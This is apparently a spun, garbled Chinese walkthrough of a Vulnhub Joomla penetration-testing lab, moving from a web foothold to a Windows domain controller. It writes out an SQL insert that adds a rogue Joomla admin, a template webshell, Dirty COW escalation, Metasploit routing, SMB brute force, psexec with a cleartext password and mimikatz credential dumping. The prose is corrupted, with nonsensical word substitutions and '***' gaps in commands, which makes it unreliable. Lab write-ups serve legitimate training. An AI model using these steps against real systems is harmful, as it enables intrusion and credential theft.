将自然环境从官在网上免费下载出来，只必须添加相对的一个VMNET2的网口，且IP段为

必须进到centos重新启动一下网口，最少我是那么做的才寻找IP。

文中涉及到知识要点实际操作训练：Vulnhub之Joomla （这节课关键解读Vulnhub网站渗透测试实战演练射击场有关Joomla CMS的综合性渗入训练，根据该试验学习培训网站渗透测试的信息收集、漏洞扫描系统与运用、管理权限提高，最后获得/root下的flag。）

系统架构图

服务器发觉

nmap -sn 192.168.124.0/24

端口号

nmap -sS 192.168.124.16

搜集到3个端口号，暂不做所有扫描仪。那么就首先看下首页，以下。

web网站

是一个joomla的web页面，随手一个administrator放到url后边，见到后台管理，见到后台管理，见到后台管理。我还是较为乐观的人，总想要去尝试尝试一两个弱口令。实际总是会帮我一记洪亮的巴掌，不成功结束。

只能取出dirsearch，随后扫描仪下文件目录：

它是以末尾的文件后缀名，应当不容易被当做php实行，因此 ，

这个时候，就可以数据库连接了，那么就找登陆密码进后台管理。

难道说還是想我工程爆破？假如要我工程爆破，那这必定是个弱口令。先去在网上**(字典)，取出大菠萝(john)便是一顿扫。**打完后，发觉对手分毫没动，那，那宣布不成功吧。都说不成功是取得成功的爹。然后换构思，便是在当地构建一个一模一样的。随后将自身mysql里的password字段名拷贝到总体目标数据库查询中去或是添加一个新用户，好懒是暗黑之魂2。随后，在 *** 上寻找立即添加到数据库查询的方式，在

改为总体目标设备上的表名就可以了：

INSERT INTO `am2zu_users`

(`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)

VALUES ('Administrator2', 'admin2',

'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());

INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`)

VALUES (LAST_INSERT_ID(),'8');

# 这儿便是添加了一个admin2的客户，登陆密码为secret

尽管登陆密码文件格式不一样，可是仍然能进后台管理。

在模版处能够改动网站源代码：Extensions-->Templates，在index.php中 *** 一句话，储存。

该展示尚方宝剑——蚁剑了，致命一击进到内网了。随后就翻车了

这，，，原来是被禁止使用了风险涵数，尽管不可以运行命令，可是能见到php版本，是php7的。随后发觉蚁剑有专业的绕开disable_function的软件，姿态非常好，有点儿狐气。随后对于php7的绕开逐个逐个试。

绕开了会弹出来一个新的互动式shell页面

管理权限太低，是个www-data的管理权限。坚信历经一番勤奋应用姿势提权，总是会失落的。那么就只有是自身沒有搞好信息收集，找：计划任务、/home、/etc/passwd、网址网站根目录、/tmp文件目录。最终在中国见到用户名密码

可是并沒有在本设备上发觉这一 wwwuser 的客户。干脆尝试下，又不违法犯罪。

居然成功了？猜想应当干了分享将http要求转到内网的服务器上，有内网就可以再次渗入。

而应用ssh连接的服务器的网口，有三个，一个连接外网，一个联接内网。

随后然后提权这台外网地址的服务器，很成功，看来是先拔头筹。看过下核心为2.6.32 而且是centos的电脑操作系统，立即应用脏牛提权取得成功。

获得一个msf对话，然后渗入。

添加路由器

meterpreter > run get_local_subnets

meterpreter > run autoroute -s 192.168.93.0/255.255.255.0

检测内网服务器的生存

# 对于windows

use auxiliary/scanner/ *** b/ *** b_version

# linux

use auxiliary/scanner/discovery/arp_sweep 用这一沒有检测出windows服务器

最后全部服务器以下

三个windows，2个应用ms17-010，无果。都没能获得对话。

啊，这....。最终效仿了下他人的方式，原来是工程爆破。字典不足强劲，最终還是将登陆密码添加到字典中来到（万般无奈）。倘若说我工程爆破出来

use auxiliary/scanner/ *** b/ *** b_login

set *** BUSER administrator

set PASS_FILE /root/桌面上/passlist

获得对话。现阶段的状况是windows在内网，添加的路由器是把战机带到到内网，应用reverse_tcp是联接不到了，只有顺向联接。

use exploit/windows/ *** b/psexec

set payload windows/x64/meterpreter/bind_tcp

set rhosts 192.168.93.30

set *** buser administrator

set *** bpass 123qwe!ASD

随后取得2个对话，这一exploit必须多尝试几回，才行。

查询是不是在域自然环境

meterpreter > sysinfo

sysinfo" _src="">

在server2008上发觉域控登陆后的纪录，随后应用 mimikatz 获得到密文域控登陆密码。

load mimikatz

mimikatz_command -f privilege::debug

mimikatz_command -f sekurlsa::logonPasswords

获得域管理员账号登陆密码。因为登陆密码的独特性，尝试应用wmiexec.py一直没取得成功，2个在linux是特殊字符，表明再次实行上一条指令。随后根据下边方式取得shell

当今客户为

远程桌面连接

run post/windows/manage/enable_rdp

proxychains rdesktop 192.168.93.20